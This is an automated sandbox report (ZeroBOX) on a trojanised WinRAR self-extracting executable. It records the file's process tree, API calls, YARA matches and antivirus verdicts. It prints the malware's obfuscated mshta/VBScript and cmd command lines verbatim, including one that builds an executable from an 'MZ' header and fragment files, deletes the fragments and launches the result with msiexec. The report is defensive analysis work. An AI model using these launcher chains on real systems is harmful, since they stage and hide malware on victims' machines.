Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 18, 2021, 9:27 a.m.	Oct. 18, 2021, 9:33 a.m.

Size	2.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`816fb2a92609e69e339ee9677647b7f8`
SHA256	`999cc7c5be617332ac3863879df3a9e35ad950c1abc0d4dea4527c9fd201a75c`
CRC32	`E120976F`
ssdeep	`49152:A6PaCYmJmOPRkgQVs9kv3ZJoGzlnJamHgLdWohu4D1jG:faCY4tPRkokvJrzlnJ1Hg/hL1a`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

search_hyperfs_212.exe "C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"
2456
- mshta.exe "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
  1744
  - cmd.exe "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ) do taskkill -f -iM "%~NxM"
    2916
    - kPBhgOaGQk.exe ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
      1088
      - mshta.exe "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        2544
        
        cmd.exe "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        1632
      - mshta.exe "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\test22\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        2092
        
        cmd.exe "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\test22\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        2500
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        2968
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        2344
        
        msiexec.exe msiexec -Y ..\lXQ2g.WC
        2512
    - taskkill.exe taskkill -f -iM "search_hyperfs_212.exe"
      2256
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 18, 2021, 9:27 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (15 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\RarSFX0> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: -f -iM "search_hyperfs_212.exe" console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: SUCCESS: The process "search_hyperfs_212.exe" with PID 2456 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: The file cannot be copied onto itself. console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: 0 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: hKS2IU.1Q console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: 9Bu~.w console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: MyBa.V console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: 1w8lBDVH.aou console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: WcWfz1Tn.MJ console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: wCbG6.QA console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: TRMBiI66.CU console_handle: 0x00000007	1	1
WriteConsoleW Oct. 18, 2021, 9:27 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 18, 2021, 9:27 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

Allocates read-write-execute memory (usually to unpack itself) (12 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ef2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 1744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 1088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2092 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x736a1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2512 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00370000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2512 region_size: 921600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2d0a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2512 region_size: 921600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2d190000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2512 region_size: 700416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2512 region_size: 708608 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2d280000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2021, 9:27 a.m.	process_identifier: 2512 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00500000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Oct. 18, 2021, 9:20 a.m.	total_number_of_free_bytes: 10217275392 free_bytes_available: 10217275392 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates a suspicious process (12 events)

cmdline	MsHtA vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
cmdline	C:\Windows\System32\cmd.exe /R EcHO UwC:\Users\test22\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo \| Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
cmdline	"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\test22\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo \| Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
cmdline	C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
cmdline	mShtA.exE VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\test22\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo \| Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
cmdline	C:\Windows\system32\cmd.exe /S /D /c" EcHo "
cmdline	"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ) do taskkill -f -iM "%~NxM"
cmdline	"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
cmdline	"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
cmdline	MsHtA vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
cmdline	"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
cmdline	"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\test22\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo \| Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\LXQ2G.WC

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "search_hyperfs_212.exe")

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 18, 2021, 9:27 a.m.	show_type: 0 filepath_r: cmd parameters: /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ) do taskkill -f -iM "%~NxM" filepath: cmd	1	1
ShellExecuteExW Oct. 18, 2021, 9:27 a.m.	show_type: 0 filepath_r: cmd parameters: /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM" filepath: cmd	1	1
ShellExecuteExW Oct. 18, 2021, 9:27 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /R EcHO UwC:\Users\test22\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo \| Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC filepath: C:\Windows\System32\cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 18, 2021, 9:27 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (30 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Oct. 18, 2021, 9:27 a.m.	status_code: 0x00000001 process_identifier: 2456 process_handle: 0x0000018c		0	0
NtTerminateProcess Oct. 18, 2021, 9:27 a.m.	status_code: 0x00000001 process_identifier: 2456 process_handle: 0x0000018c	1	0	0

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	MsHtA vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
cmdline	cmd /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ) do taskkill -f -iM "%~NxM"
cmdline	cmd /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
cmdline	"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe" ) do taskkill -f -iM "%~NxM"
cmdline	"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\search_hyperfs_212.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
cmdline	"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
cmdline	MsHtA vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
cmdline	taskkill -f -iM "search_hyperfs_212.exe"
cmdline	"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\test22\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2916 resumed a thread in remote process 1088
Process injection	Process 2500 resumed a thread in remote process 2512
NtResumeThread Oct. 18, 2021, 9:27 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1088	1	0	0
NtResumeThread Oct. 18, 2021, 9:27 a.m.	thread_handle: 0x0000008c suspend_count: 0 process_identifier: 2512	1	0	0

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Lionic	Trojan.Win32.Qshell.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.47198012
FireEye	Generic.mg.816fb2a92609e69e
Cylance	Unsafe
Sangfor	Trojan.Win32.Qshell.kdv
Alibaba	Trojan:Win32/Cryprar.96eff706
K7GW	Trojan ( 0057be3e1 )
K7AntiVirus	Trojan ( 0057be3e1 )
Arcabit	Trojan.Generic.D2D02F3C
ESET-NOD32	RAR/Agent.DJ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan.Win32.Qshell.kdv
BitDefender	Trojan.GenericKD.47198012
Avast	FileRepMalware
Ad-Aware	Trojan.GenericKD.47198012
Emsisoft	Trojan.GenericKD.47198012 (B)
Comodo	fls.noname@0
McAfee-GW-Edition	BehavesLike.Win32.Generic.tc
Sophos	Mal/Generic-S
Ikarus	Trojan.Agent
eGambit	Unsafe.AI_Score_54%
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Gridinsoft	Ransom.Win32.Wacatac.ns
Microsoft	Trojan:Win32/Tnega!ml
GData	Trojan.GenericKD.47198012
Cynet	Malicious (score: 100)
McAfee	Artemis!816FB2A92609
MAX	malware (ai score=100)
Zoner	Probably Heur.RARAutorun
TrendMicro-HouseCall	TROJ_GEN.R002H0DJG21
Rising	Malware.AbnormalScript/SFX!1.D9B9 (CLASSIC)
Fortinet	W32/RARAgent.DL!tr
AVG	FileRepMalware

search_hyperfs_212.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All